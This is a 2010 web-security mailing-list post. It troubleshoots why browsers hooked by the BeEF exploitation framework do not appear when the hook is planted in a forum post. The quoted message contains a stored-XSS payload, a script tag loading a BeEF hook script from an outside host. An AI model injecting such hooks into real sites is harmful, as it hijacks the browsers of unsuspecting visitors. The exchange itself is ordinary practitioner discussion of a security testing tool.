[WEB SECURITY] beef question

Dan Anderson dan-anderson at cox.net
Wed Jun 16 04:39:46 EDT 2010


So, is the problem you are having that the zombies are not showing up
under the "BeEF" cow?

Are they showing up at all (i.e. in the zombies menu?)

Dan

On Tue, Jun 15, 2010 at 10:11 AM, Alex Fiuvertiz <fiuvertiz at gmail.com> wrote:
> This is the way I do it:
>
> I sit at work and start a browser (I've tried different types to
> eliminate that factor). When I launch the browser I enter the URL:
> http://www.example.com/beef/hook/xss-example.htm
> Pressing enter and...
>
> ...the Zombie shows up.
>
> When I instead do a forum post with:
> <script src="http://www.example.com/beef/hook/beefmagic.js.php"></script>
>
> ...the Zombie doesn't show up (when I visit the forum post). But the
> server gets the request (and is answering with a 200 OK).
>
> The same effect could easily be achieved with doing a local HTML-file
> on the Desktop (still at work) and open it locally in the browser.
>
>
>
> / Alex

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

To unsubscribe email websecurity-unsubscribe at webappsec.org and reply to 
the confirmation email

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA



More information about the websecurity mailing list